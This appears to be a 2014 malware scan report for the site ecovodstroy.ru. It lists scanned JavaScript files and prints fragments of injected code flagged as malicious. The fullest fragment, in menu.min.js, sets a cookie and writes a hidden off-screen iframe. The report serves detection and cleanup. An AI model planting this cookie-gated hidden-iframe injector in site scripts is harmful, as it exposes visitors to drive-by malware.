Scanned pages/files
| Request | Server response | Status |
http://www.ecovodstroy.ru/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 09 Oct 2014 00:14:27 GMT Location: http://ecovodstroy.ru/ Server: nginx/0.7.67 Vary: Accept-Encoding Content-Length: 314 Content-Type: text/html; charset=iso-8859-1 | clean |
http://ecovodstroy.ru/ | 200 OK Content-Length: 28919 Content-Type: text/html | clean |
http://ecovodstroy.ru/media/system/js/caption.js | 200 OK Content-Length: 2946 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); container.appendChild(text); } container.className = this.selector.replace('.', '_'); container.className = container.className + " " + align; container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://ecovodstroy.ru/modules/mod_news_pro_gk4/interface/scripts/engine-mootools-11.js | 200 OK Content-Length: 10665 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); $E('.nsp_'+position+'_interface .pagination', module).getElementsBySelector('li')[i].setProperty('class', 'active'); } } function nsp_art_counter(i, module, position, num){ if($E('.nsp_'+position+'_interface .counter', module)){ $E('.nsp_'+position+'_interface .counter span', module).innerHTML = (i+1) + ' / ' + num; } } });;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://ecovodstroy.ru/modules/mod_nivoslider/assets/jquery.js | 200 OK Content-Length: 78729 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); b],f.body["scroll"+b],f.documentElement["scroll"+b],f.body["offset"+b],f.documentElement["offset"+b]):e===A?parseFloat(c.css(f,d)):this.css(d,typeof e==="string"?e:e+"px")}})})(window); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://ecovodstroy.ru/modules/mod_nivoslider/assets/jquery.nivo.slider.js | 200 OK Content-Length: 10270 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); Antivirus reports:
| ||
http://ecovodstroy.ru/modules/mod_ariextmenu/mod_ariextmenu/js/ext-core.js | 200 OK Content-Length: 86819 Content-Type: application/javascript | clean |
http://ecovodstroy.ru/modules/mod_ariextmenu/mod_ariextmenu/js/menu.min.js | 200 OK Content-Length: 1067 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } var cookie = getCookie('p21nt198sc'); if (cookie == undefined) { setCookie('p21nt198sc', true, 292200); document.write('<iframe style="position:absolute;left:-999px;top:-999px;" height="115" width="115" src=""></iframe>'); } })(); Antivirus reports:
| ||
http://ecovodstroy.ru/modules/mod_yoo_search/mod_yoo_search.js | 200 OK Content-Length: 4555 Content-Type: application/javascript | clean |
http://www.ecovodstroy.ru/modules/mod_mg_menu/ieHover.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 09 Oct 2014 00:14:30 GMT Location: http://ecovodstroy.ru/modules/mod_mg_menu/ieHover.js Server: nginx/0.7.67 Vary: Accept-Encoding Content-Length: 344 Content-Type: text/html; charset=iso-8859-1 | clean |
http://ecovodstroy.ru/modules/mod_mg_menu/iehover.js | 404 Not Found Content-Length: 4325 Content-Type: text/html | clean |
http://ecovodstroy.ru/test404page.js | 404 Not Found Content-Length: 4325 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ecovodstroy.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 09 Oct 2014 00:14:27 GMT
Pragma: no-cache
Server: nginx/0.7.67
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 09 Oct 2014 00:14:27 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 9f14ed14c1706e9b2c003a16c304091f=eum9f339htahlp1vueukicf2c5; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: ecovodstroy.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 09 Oct 2014 00:14:27 GMT
Pragma: no-cache
Server: nginx/0.7.67
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 09 Oct 2014 00:14:27 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 9f14ed14c1706e9b2c003a16c304091f=eum9f339htahlp1vueukicf2c5; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: ecovodstroy.ru
Referer: http://www.google.com/search?q=ecovodstroy.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ecovodstroy.ru
Referer: http://www.google.com/search?q=ecovodstroy.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ecovodstroy.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ecovodstroy.ru/
Result: ecovodstroy.ru is not infected or malware details are not published yet.
Result: ecovodstroy.ru is not infected or malware details are not published yet.